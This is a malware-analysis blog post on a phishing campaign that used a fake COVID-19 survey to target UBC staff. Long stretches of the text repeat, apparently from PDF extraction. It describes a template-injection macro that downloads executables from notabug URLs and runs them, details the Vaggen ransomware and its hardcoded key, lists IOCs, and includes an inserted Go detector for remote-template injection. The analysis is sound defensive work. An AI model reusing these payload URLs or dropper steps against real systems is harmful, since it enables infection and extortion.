main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2719 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). 
At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2720 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2721 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2722 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2723 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2724 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2725 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2726 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2727 
of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2728 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. 
When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2729 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2730 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. 
The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2731 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2732 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2733 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2734 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2735 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2736 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. 
A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2737 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2738 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. 
Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2739 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2740 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). 
At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2741 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2742 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2743 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2744 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2745 of 
This post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.

In recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed to the Silent Librarian APT group.
On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.

However, this attack and its motives differ from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims who want to recover their encrypted files.

On discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful due to the rapid response of the UBC cybersecurity team.

Mandatory COVID-19 survey distributed to targeted recipients

The attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and Dropbox. Rather than sending the fake survey directly via email, the attacker uploaded the document to Box and Dropbox and used the share functionality of these platforms to distribute it.

This was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much more difficult to detect spam coming from file sharing services without creating a number of false positives.

The attacker claimed to be a manager and added the following comment to the file sharing invitation (shared with us by UBC):

Good evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more.
Please fill it out ASAP!

You will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!

In advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!

According to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file, since it was shared privately rather than publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.

Phishing document analysis

The phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro.
That file was uploaded to a free code hosting website (notabug.org).

When the macro is executed, it does the following:

Gets the %APPDATA% directory
Creates the Byxor directory in %APPDATA%
Downloads a file from notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe and writes it as Polisen.exe
Downloads a file from notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe and writes it as Killar.exe
Calls the VBA Shell function to execute killar.exe
Checks the return value of the Shell call to determine whether it succeeded (Shell returns the task ID of the launched process, or 0 on failure)
If successful, sends an HTTP GET request to canarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
If not successful, sends an HTTP GET request to canarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html

We were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.

Opening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted about a particular event, which can be very useful as an early warning that an intruder has had access to a network.
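The template injection described in this section lives in the document's relationship parts rather than in its visible content: a .docx is a ZIP container, and when the document opens Word follows whatever word/_rels/settings.xml.rels declares as an External attachedTemplate, loading the remote .dotm and its macros. The Go program below is an added example, not code from the original post or from UBC: it opens such a container, parses every word/_rels/*.rels part, and reports attachedTemplate relationships whose target is an http(s) or UNC location, while leaving the usual file:// reference to a local Normal.dotm alone. The in-memory sample it scans is constructed here, and the example.invalid URL is a placeholder, not an indicator from this campaign.

```go
package main

import (
	"archive/zip"
	"bytes"
	"encoding/xml"
	"fmt"
	"io"
	"strings"
)

// attachedTemplateType is the OOXML relationship type Word follows to load a
// document's template, macros included, when the document is opened.
const attachedTemplateType = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"

// relationships mirrors a .rels part; only the attributes the scan needs.
type relationships struct {
	Rels []struct {
		ID         string `xml:"Id,attr"`
		Type       string `xml:"Type,attr"`
		Target     string `xml:"Target,attr"`
		TargetMode string `xml:"TargetMode,attr"`
	} `xml:"Relationship"`
}

// RemoteTemplate is one attachedTemplate relationship that points off-host.
type RemoteTemplate struct {
	Part   string // the .rels part that declared it, normally word/_rels/settings.xml.rels
	Target string // the location Word will fetch the template from
}

// isRemote treats http(s) and UNC targets as remote. A benign attachedTemplate
// usually carries a file:// path to the user's local Normal.dotm.
func isRemote(target string) bool {
	t := strings.ToLower(strings.TrimSpace(target))
	return strings.HasPrefix(t, "http://") || strings.HasPrefix(t, "https://") || strings.HasPrefix(t, `\\`)
}

// FindRemoteTemplates opens a .docx (a ZIP container) and reports every
// attachedTemplate relationship under word/_rels/ that is External and remote:
// the template injection primitive the phishing document relies on.
func FindRemoteTemplates(docx []byte) ([]RemoteTemplate, error) {
	zr, err := zip.NewReader(bytes.NewReader(docx), int64(len(docx)))
	if err != nil {
		return nil, fmt.Errorf("not a zip container: %w", err)
	}
	var found []RemoteTemplate
	for _, f := range zr.File {
		if !strings.HasPrefix(f.Name, "word/_rels/") || !strings.HasSuffix(f.Name, ".rels") {
			continue
		}
		rc, err := f.Open()
		if err != nil {
			return nil, err
		}
		data, err := io.ReadAll(io.LimitReader(rc, 1<<20)) // .rels parts are small; cap the read
		rc.Close()
		if err != nil {
			return nil, err
		}
		var rels relationships
		if err := xml.Unmarshal(data, &rels); err != nil {
			return nil, fmt.Errorf("%s: %w", f.Name, err)
		}
		for _, r := range rels.Rels {
			if r.Type == attachedTemplateType && strings.EqualFold(r.TargetMode, "External") && isRemote(r.Target) {
				found = append(found, RemoteTemplate{Part: f.Name, Target: r.Target})
			}
		}
	}
	return found, nil
}

// buildDocx assembles a minimal in-memory .docx with one attachedTemplate
// relationship. Constructed sample data for this example, not a captured lure.
func buildDocx(target, mode string) []byte {
	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)
	parts := [][2]string{
		{"[Content_Types].xml", `<?xml version="1.0" encoding="UTF-8"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>`},
		{"word/document.xml", `<?xml version="1.0" encoding="UTF-8"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body/></w:document>`},
		{"word/_rels/settings.xml.rels", `<?xml version="1.0" encoding="UTF-8"?>` +
			`<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">` +
			`<Relationship Id="rId1" Type="` + attachedTemplateType + `" Target="` + target + `" TargetMode="` + mode + `"/>` +
			`</Relationships>`},
	}
	for _, p := range parts {
		w, _ := zw.Create(p[0])
		io.WriteString(w, p[1])
	}
	zw.Close()
	return buf.Bytes()
}

func main() {
	// Hypothetical URL standing in for the notabug.org-hosted template.
	sample := buildDocx("https://example.invalid/remote/template.dotm", "External")
	hits, err := FindRemoteTemplates(sample)
	if err != nil {
		panic(err)
	}
	for _, h := range hits {
		fmt.Printf("remote template in %s -> %s\n", h.Part, h.Target)
	}
}
```

To run it against a real sample, read the file with os.ReadFile and pass the bytes to FindRemoteTemplates; a hit is enough to treat the document as malicious regardless of whether the remote .dotm is still online, since the URL itself is the indicator.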
In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.

Vaggen ransomware

After being deployed, the ransomware starts encrypting the user’s files, adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop demanding a payment equivalent to 80 USD in Bitcoin.

The ransomware appears to be coded from scratch and is a relatively straightforward application written in Go, starting with the function denoted as ‘main_main’.

Other functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA. The roles we identified:

main_LAMNARDETTA -> main_enumDir
main_ELDBJORT -> main_encryptFile
main_SPRINGA -> main_encryptAndRen

A full list of the functions, along with their RVAs, can be found here.

Some of the strings used by the malware (i.e. the content of the ransom note) are encrypted with XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64. The XXTEA key is hardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.

Encrypting and renaming of the files is implemented as the callback of the standard Go function path/filepath.Walk.

Files are encrypted with AES-256 (32-byte key) in GCM mode. The encryption algorithm is similar to the one demonstrated here.
Using a hardcoded key and a 12-byte nonce generated by CryptGenRandom, the file content is encrypted with the gcm.Seal function.

The content of the output file (with the .VAGGEN extension) is:

the 12-byte nonce
the encrypted content
the 16-byte GCM tag

The hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take my heart my money”. Using this key, we can easily decrypt the content.

With all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.

Unusually low ransom amount

Based on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this attack can be recovered from fairly easily.

However, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It’s unclear at this point whether the University of British Columbia was the sole target.

Crawling additional repositories created by the threat actor, we found other Word template files that used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.

We are grateful for the information shared with us by the University of British Columbia.
This allowed us to paint a better picture of this attack and understand who the targets were.

Malwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.

IOCs

Variant 1:
summerofficetemplate.dotm
634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
